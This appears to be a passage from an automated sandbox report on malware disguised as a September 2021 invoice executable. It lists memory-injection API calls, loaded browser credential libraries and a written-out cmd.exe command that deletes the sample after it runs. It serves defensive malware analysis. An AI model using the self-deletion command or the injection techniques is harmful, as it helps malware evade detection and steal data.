    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA9D90_2_022FA9D9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 24_2_6E9AB77824_2_6E9AB778
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 24_2_6E99276624_2_6E992766
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 24_2_6E99F41F24_2_6E99F41F
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 24_2_6E9B311224_2_6E9B3112
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk,0_2_022F7E91
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6F7D NtAllocateVirtualMemory,0_2_022F6F7D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB3C0 NtProtectVirtualMemory,0_2_022FB3C0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F11C2 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,0_2_022F11C2
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB9D0 NtMapViewOfSection,0_2_022FB9D0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5E24 NtWriteVirtualMemory,0_2_022F5E24
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBE21 NtMapViewOfSection,0_2_022FBE21
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBE33 NtMapViewOfSection,0_2_022FBE33
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBA02 NtMapViewOfSection,0_2_022FBA02
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0E1E NtWriteVirtualMemory,LoadLibraryA,0_2_022F0E1E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5A6E NtWriteVirtualMemory,0_2_022F5A6E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBE7C NtMapViewOfSection,0_2_022FBE7C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBA7B NtMapViewOfSection,0_2_022FBA7B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5679 NtWriteVirtualMemory,0_2_022F5679
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBAB9 NtMapViewOfSection,0_2_022FBAB9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5EB4 NtWriteVirtualMemory,0_2_022F5EB4
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F628C NtWriteVirtualMemory,0_2_022F628C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBE8A NtMapViewOfSection,0_2_022FBE8A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5EEB NtWriteVirtualMemory,0_2_022F5EEB
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBEE5 NtMapViewOfSection,0_2_022FBEE5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5AD7 NtWriteVirtualMemory,0_2_022F5AD7
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBED7 NtMapViewOfSection,0_2_022FBED7
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F630E NtWriteVirtualMemory,0_2_022F630E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBF03 NtMapViewOfSection,0_2_022FBF03
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F577F NtWriteVirtualMemory,0_2_022F577F
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBB56 NtMapViewOfSection,0_2_022FBB56
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5F52 NtWriteVirtualMemory,0_2_022F5F52
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB3AA NtProtectVirtualMemory,0_2_022FB3AA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6FA6 NtAllocateVirtualMemory,0_2_022F6FA6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBFB9 NtMapViewOfSection,0_2_022FBFB9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5FE3 NtWriteVirtualMemory,0_2_022F5FE3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB3F8 NtProtectVirtualMemory,0_2_022FB3F8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F63CC NtWriteVirtualMemory,0_2_022F63CC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBBD1 NtMapViewOfSection,0_2_022FBBD1
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F7023 NtAllocateVirtualMemory,0_2_022F7023
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBC3B NtMapViewOfSection,0_2_022FBC3B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBC07 NtMapViewOfSection,0_2_022FBC07
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3416 NtWriteVirtualMemory,LoadLibraryA,0_2_022F3416
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5C15 NtWriteVirtualMemory,0_2_022F5C15
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5813 NtWriteVirtualMemory,0_2_022F5813
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F70A6 NtAllocateVirtualMemory,0_2_022F70A6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBCA0 NtMapViewOfSection,0_2_022FBCA0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F608A NtWriteVirtualMemory,0_2_022F608A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6484 NtWriteVirtualMemory,0_2_022F6484
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBCE6 NtMapViewOfSection,0_2_022FBCE6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F58CC NtWriteVirtualMemory,0_2_022F58CC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB8C8 NtProtectVirtualMemory,0_2_022FB8C8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F70DB NtAllocateVirtualMemory,0_2_022F70DB
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5CD3 NtWriteVirtualMemory,0_2_022F5CD3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F611D NtWriteVirtualMemory,0_2_022F611D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F594D NtWriteVirtualMemory,0_2_022F594D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F555C NtWriteVirtualMemory,0_2_022F555C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBDA1 NtMapViewOfSection,0_2_022FBDA1
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F61B9 NtWriteVirtualMemory,0_2_022F61B9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9D8E NtWriteVirtualMemory,0_2_022F9D8E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5D86 NtWriteVirtualMemory,0_2_022F5D86
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA5E8 NtWriteVirtualMemory,0_2_022FA5E8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9DE5 NtWriteVirtualMemory,0_2_022F9DE5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F59E3 NtWriteVirtualMemory,0_2_022F59E3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBDF3 NtMapViewOfSection,0_2_022FBDF3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F55CA NtWriteVirtualMemory,0_2_022F55CA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeProcess Stats: CPU usage > 98%
    Source: api-ms-win-crt-private-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-conio-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-math-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-time-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-util-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-environment-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-localization-l1-2-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-string-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l2-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-2-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-libraryloader-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-1.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-string-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-profile-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-utility-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-multibyte-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-heap-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-handle-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-sysinfo-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-2-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-namedpipe-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-interlocked-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-timezone-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processenvironment-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-memory-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-process-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.24.drStatic PE information: No import functions for PE file found
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000000.251809754.000000000041E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000000.539833282.000000000041E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862316814.000000006EA8B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862415894.000000006F6D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeBinary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: sqlite3.dll.24.drStatic PE information: Number of sections : 18 > 10
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeVirustotal: Detection: 28%
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeProcess created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeProcess created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior